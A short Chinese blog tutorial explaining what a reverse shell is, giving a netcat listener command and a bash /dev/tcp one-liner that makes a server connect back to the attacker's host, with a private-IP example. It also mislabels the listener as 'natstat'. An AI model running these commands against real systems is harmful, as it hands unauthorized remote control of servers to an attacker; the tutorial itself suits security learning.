记一次反弹shell的操作【非常简单】

本文介绍了反弹shell的概念,即通过在本地开启监听端口,使服务器主动连接并提供shell,实现对远程服务器的控制。文章详细解释了如何使用natstat命令或程序进行监听,并给出了一个实际操作示例。

#什么是反弹shell
通常我们对一个开启了80端口的服务器进行访问时,就会建立起与服务器Web服务链接,从而获取到服务器相应的Web服务。而反弹shell是我们开启一个端口进行监听,转而让服务器主动反弹一个shell来连接我们的主机,我们再通过接收到的shell进而来远程控制服务器。

在这里插入图片描述

反弹shell命令

首先本地进行监听:
主要是用natstat命令(也可以利用程序监听)
nc -lk 35436
在这里插入图片描述
从被攻击服务器上发起命令如下:
bash -i > /dev/tcp/{你的ip}/{你监听的端口} 0>&1 2>&1
例如:
bash -i >/dev/tcp/192.168.0.46/35436 0>&1 2>&1
在这里插入图片描述
我们的主机就会自动登录到远程机器的bash上
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值